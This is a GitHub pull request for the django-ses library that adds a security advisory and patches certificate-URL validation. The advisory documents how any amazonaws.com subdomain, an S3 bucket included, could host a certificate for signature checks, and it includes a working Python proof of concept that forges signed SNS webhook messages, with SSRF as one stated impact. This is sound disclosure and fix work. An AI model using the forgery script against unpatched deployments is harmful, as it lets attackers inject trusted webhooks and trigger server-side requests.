Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security vulnerabilty: signature verification on arbitrary amazonaws subdomains #284

Merged
merged 5 commits into from
May 21, 2023
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
227 changes: 227 additions & 0 deletions CVE/001-cert-url-signature-verification.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,227 @@
# Certificate URL: signature verification exposure

0. TL;DR:

If you were using the default setting or any `amazonaws.com` subdomain for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS`,
signature verification webhooks would have allowed someone hosting an arbitrary S3 bucket to send verified webhook
calls to your server.

`django-ses==3.5.0` addresses this by matching the `amazonaws.com` certificate URLs against a known regex, `SES_REGEX_CERT_URL`.

1. Overview

The django_ses library implements a mail backend for Django using AWS Simple Email Service.
The library exports the `SESEventWebhookView` class intended to receive signed requests from AWS
to handle email bounces, subscriptions, etc.
These requests are signed by AWS and are verified by django_ses, however the verification of this
signature was found to be flawed as it allowed users to specify arbitrary public certificates.

2. Description

The [`SESEventWebhookView`](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L379)
view class implements a [`post` handler](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L409)
which receives signed requests. By default (as [noted](https://github.com/django-ses/django-ses/tree/master#full-list-of-settings) in the README)
signature verification is enabled. Signature verification is [performed](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L420)
by the [`verify_event_message`](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L252)
utility function which uses the `EventMessageVerifier.is_verified` method.

This method obtains the public certificate from a URL passed within the request
(https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L166-L189):

```py
def _get_cert_url(self):
"""
Get the signing certificate URL.
Only accept urls that match the domains set in the
AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS setting. Sub-domains
are allowed. i.e. if amazonaws.com is in the trusted domains
then sns.us-east-1.amazonaws.com will match.
"""
cert_url = self._data.get("SigningCertURL")
if not cert_url:
logger.warning('No signing certificate URL: "%s"', cert_url)
return None

if not cert_url.startswith("https://"):
logger.warning('Untrusted certificate URL: "%s"', cert_url)
return None

url_obj = urlparse(cert_url)
for trusted_domain in settings.EVENT_CERT_DOMAINS:
parts = trusted_domain.split(".")
if url_obj.netloc.split(".")[-len(parts) :] == parts:
return cert_url

return None
```

Some validation is performed on the certificate URL to ensure it is from a trusted domain. By default, the trusted domains are
(https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/settings.py#L50-L61):

```py
EVENT_CERT_DOMAINS = getattr(
settings,
'AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS',
getattr(
settings,
'AWS_SNS_BOUNCE_CERT_TRUSTED_DOMAINS',
(
'amazonaws.com',
'amazon.com',
)
)
)
```

However, the validation of the certificate URL allows for arbitrary subdomains. Because anyone can host arbitrary files on a
subdomain of `amazonaws.com` (through hosting an AWS S3 bucket), it is possible to host an arbitrary public certificate which
gets validated and used to verify signatures.

3. Proof of Concept

To test the vulnerability, we can create a Django app and install the library:

```sh
django-admin startproject demo
cd demo
pip3 install django-ses[events]
```

Then, add the SESEventWebhookView view to the `urlpatterns` list in `urls.py`:

```py
from django.urls import path
from django_ses.views import SESEventWebhookView

urlpatterns = [
path(r'ses/event-webhook/', SESEventWebhookView.as_view(), name='handle-event-webhook')
]
```

Run the server:

```py
python manage.py runserver
```

This runs the server on port 8000. Notice that if you send a POST request to `/ses/event-webhook`
it will fail with "Signature verification failed.":

```sh
curl -X POST http://localhost:8000/ses/event-webhook/ -d '{"Type":"SubscriptionConfirmation", "SubscribeURL": "https://example.com"}'
Signature verification failed.
```

The following Python script implements a proof of concept that signs an arbitrary payload using our attacker-controlled
private key. For convenience of testing, the certificate is available at

https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer

and the private key is available at

https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key

```py
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.primitives.asymmetric import utils
import json
import requests
from base64 import b64encode

# https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L191
def _get_bytes_to_sign(_data):
"""
Creates the message used for signing SNS notifications.
This is used to verify the bounce message when it is received.
"""

# Depending on the message type the fields to add to the message
# differ so we handle that here.
msg_type = _data.get('Type')
if msg_type == 'Notification':
fields_to_sign = [
'Message',
'MessageId',
'Subject',
'Timestamp',
'TopicArn',
'Type',
]
elif (msg_type == 'SubscriptionConfirmation' or
msg_type == 'UnsubscribeConfirmation'):
fields_to_sign = [
'Message',
'MessageId',
'SubscribeURL',
'Timestamp',
'Token',
'TopicArn',
'Type',
]
else:
# Unrecognized type
return None

bytes_to_sign = []
for field in fields_to_sign:
field_value = _data.get(field)
if not field_value:
continue

# Some notification types do not have all fields. Only add fields
# with values.
bytes_to_sign.append(f"{field}\n{field_value}\n")

return "".join(bytes_to_sign).encode()

cert_url = 'https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer'
# privkey available here https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key
privkey = serialization.load_pem_private_key(open('./private.key','rb').read(), password=None)
target_endpoint = 'http://localhost:8000/ses/event-webhook/'

payload = {
'Type': 'SubscriptionConfirmation',
'SubscribeURL': 'http://localhost:9999',
}

sign_bytes = _get_bytes_to_sign(payload)
chosen_hash = hashes.SHA1()
hasher = hashes.Hash(chosen_hash)
hasher.update(sign_bytes)
digest = hasher.finalize()
sig = privkey.sign(
digest,
padding.PKCS1v15(),
utils.Prehashed(chosen_hash)
)
payload['SigningCertURL'] = cert_url
payload['Signature'] = b64encode(sig).decode()

r = requests.post(target_endpoint, json=payload)
print(r.status_code) # this is 200, which indicates the message was accepted
```

3. Impact

The impact may vary depending on the context of the application and how bounce events are
handled. Due to the fact that the library suggests that signatures are verified by default,
consumers may consider the data to be trusted and hence use it without appropriate validation.
At the very least, this issue allows a (blind) SSRF vulnerability through the `SubscriptionConfirmation`
event type, however I didn't note this having a very large impact on its own.

4. Credits

Joseph Surin, elttam

5. Recommendations

If you're not setting a value for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS`, upgrade to `v3.5.0` and re-test your webhooks to make sure the
signature verification still passes.

If you are setting a value for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS` and it contains `amazonaws.com`, set the full domain instead. This
is best practice even if your domain is not `amazonaws.com`, to restrict the possible security risk of other subdomains sending
verifiable webhook calls.

See `django-ses` [Releases](https://github.com/django-ses/django-ses/releases/tag/v3.5.0) for more details about the code changes.
82 changes: 50 additions & 32 deletions django_ses/utils.py
Original file line number Diff line number Diff line change
@@ -1,21 +1,25 @@
import base64
import logging
import re
import warnings
from builtins import bytes

from django_ses.deprecation import RemovedInDjangoSES20Warning

from urllib.error import URLError
from urllib.parse import urlparse
from urllib.request import urlopen
from urllib.error import URLError

from django.core.exceptions import ImproperlyConfigured

from django_ses import settings
from django_ses.deprecation import RemovedInDjangoSES20Warning

logger = logging.getLogger(__name__)

_CERT_CACHE = {}

SES_REGEX_CERT_URL = re.compile(
"(?i)^https://sns\.[a-z0-9\-]+\.amazonaws\.com(\.cn)?/SimpleNotificationService\-[a-z0-9]+\.pem$"
)


def clear_cert_cache():
"""Clear the certificate cache.
Expand Down Expand Up @@ -183,6 +187,17 @@ def _get_cert_url(self):
url_obj = urlparse(cert_url)
for trusted_domain in settings.EVENT_CERT_DOMAINS:
parts = trusted_domain.split(".")
if "amazonaws.com" in trusted_domain:
if not SES_REGEX_CERT_URL.match(cert_url):
if len(parts) < 4:
return None
else:
logger.warning('Possible security risk for: "%s"', cert_url)
logger.warning(
"It is strongly recommended to configure the full domain in EVENT_CERT_DOMAINS. "
"See v3.5.0 release notes for more details."
)

if url_obj.netloc.split(".")[-len(parts) :] == parts:
return cert_url

Expand All @@ -196,26 +211,28 @@ def _get_bytes_to_sign(self):

# Depending on the message type the fields to add to the message
# differ so we handle that here.
msg_type = self._data.get('Type')
if msg_type == 'Notification':
msg_type = self._data.get("Type")
if msg_type == "Notification":
fields_to_sign = [
'Message',
'MessageId',
'Subject',
'Timestamp',
'TopicArn',
'Type',
"Message",
"MessageId",
"Subject",
"Timestamp",
"TopicArn",
"Type",
]
elif (msg_type == 'SubscriptionConfirmation' or
msg_type == 'UnsubscribeConfirmation'):
elif (
msg_type == "SubscriptionConfirmation"
or msg_type == "UnsubscribeConfirmation"
):
fields_to_sign = [
'Message',
'MessageId',
'SubscribeURL',
'Timestamp',
'Token',
'TopicArn',
'Type',
"Message",
"MessageId",
"SubscribeURL",
"Timestamp",
"Token",
"TopicArn",
"Type",
]
else:
# Unrecognized type
Expand All @@ -237,14 +254,14 @@ def _get_bytes_to_sign(self):

def BounceMessageVerifier(*args, **kwargs):
warnings.warn(
'utils.BounceMessageVerifier is deprecated. It is renamed to EventMessageVerifier.',
"utils.BounceMessageVerifier is deprecated. It is renamed to EventMessageVerifier.",
RemovedInDjangoSES20Warning,
)

# parameter name is renamed from bounce_dict to notification.
if 'bounce_dict' in kwargs:
kwargs['notification'] = kwargs['bounce_dict']
del kwargs['bounce_dict']
if "bounce_dict" in kwargs:
kwargs["notification"] = kwargs["bounce_dict"]
del kwargs["bounce_dict"]

return EventMessageVerifier(*args, **kwargs)

Expand All @@ -262,31 +279,32 @@ def verify_bounce_message(msg):
Verify an SES/SNS bounce(event) notification message.
"""
warnings.warn(
'utils.verify_bounce_message is deprecated. It is renamed to verify_event_message.',
"utils.verify_bounce_message is deprecated. It is renamed to verify_event_message.",
RemovedInDjangoSES20Warning,
)
return verify_event_message(msg)


def confirm_sns_subscription(notification):
logger.info(
'Received subscription confirmation: TopicArn: %s',
notification.get('TopicArn'),
"Received subscription confirmation: TopicArn: %s",
notification.get("TopicArn"),
extra={
'notification': notification,
"notification": notification,
},
)

# Get the subscribe url and hit the url to confirm the subscription.
subscribe_url = notification.get('SubscribeURL')
subscribe_url = notification.get("SubscribeURL")
try:
urlopen(subscribe_url).read()
except URLError as e:
# Some kind of error occurred when confirming the request.
logger.error(
'Could not confirm subscription: "%s"', e,
'Could not confirm subscription: "%s"',
e,
extra={
'notification': notification,
"notification": notification,
},
exc_info=True,
)
2 changes: 1 addition & 1 deletion pyproject.toml
Original file line number Diff line number Diff line change
@@ -1,6 +1,6 @@
[tool.poetry]
name = "django-ses"
version = "3.4.1"
version = "3.5.0"
description = "A Django email backend for Amazon's Simple Email Service"
authors = [
"Harry Marr <harry@hmarr.com>",
Expand Down